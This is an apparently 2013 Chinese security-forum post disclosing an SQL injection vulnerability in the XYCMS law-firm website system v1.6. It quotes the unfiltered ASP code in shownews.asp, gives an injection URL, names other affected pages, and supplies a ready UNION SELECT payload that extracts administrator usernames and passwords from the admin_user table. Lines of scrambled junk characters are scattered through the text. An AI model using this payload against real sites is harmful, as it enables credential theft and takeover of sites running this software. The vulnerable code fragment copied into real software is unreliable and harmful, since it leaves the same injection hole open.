中国网络渗透测试联盟
标题:
XYCMS律师事务所建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
/ L% a, w6 F3 t' Z# y6 r
3 i" j. M2 G1 {) s; a
淫荡分割线
Z+ s3 n2 O* V- @6 K
--------------------------------------------------------
% O* H# J7 p+ O& i; w) [
}0 x0 a3 j) H% V2 t
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 v9 {. j8 `( x# O0 z4 ]& A; j
源码地址:
http://down.chinaz.com/soft/29233.htm
- G$ U2 }, e! b
) E+ w v# w' j2 W. l
漏洞文件:shownews.asp
6 a8 X% V% z, h
漏洞代码:7-13行
" k4 ]( e; S) K3 E w6 D) i
5 G5 H( f! y) G$ R5 {* \3 K# A2 Q
) N% B% ?+ G' X
<%
% n7 A6 Y% W4 I; M+ a; \$ g
id=request.QueryString("id")
; `) j' _% @8 z3 e. r
+ N: h% E* a4 L7 i8 R; _* y6 p7 l9 e
set snews=server.createobject("adodb.recordset")
4 M# O g4 h9 }0 @' v- k4 \
exec="select * from [news] where id="&id
8 T. ? a' K' l e# O0 u0 K& f3 \
snews.open exec,conn,1,1
( I. q) o$ \! @7 X8 ]) D: O
%>
' k+ K! U2 c" Y" {0 [, R6 m
; Z L) W! Z1 f1 ~+ H" H
6 |# N2 M* V9 e& p; D
什么过滤都没有 直造成注入
" M0 c3 ^7 i% }. J
. ^1 v/ f7 |) h9 p# q
注入点:
http://127.0.0.1:99/shownews.asp?id=xx
0 v& c9 n/ U4 ^( C
. O9 i- L( L$ t8 ^
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
% z- A- N# b: z
3 \9 Z9 K ?% l/ h5 }6 c2 m
! G+ a3 k2 C6 t; z
exp: union select 1,admin,password,4,5,7 from admin_user
7 d- Y+ C, `# q/ k7 X( P' y; \$ y
5 _' w; g+ b4 G4 @* Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2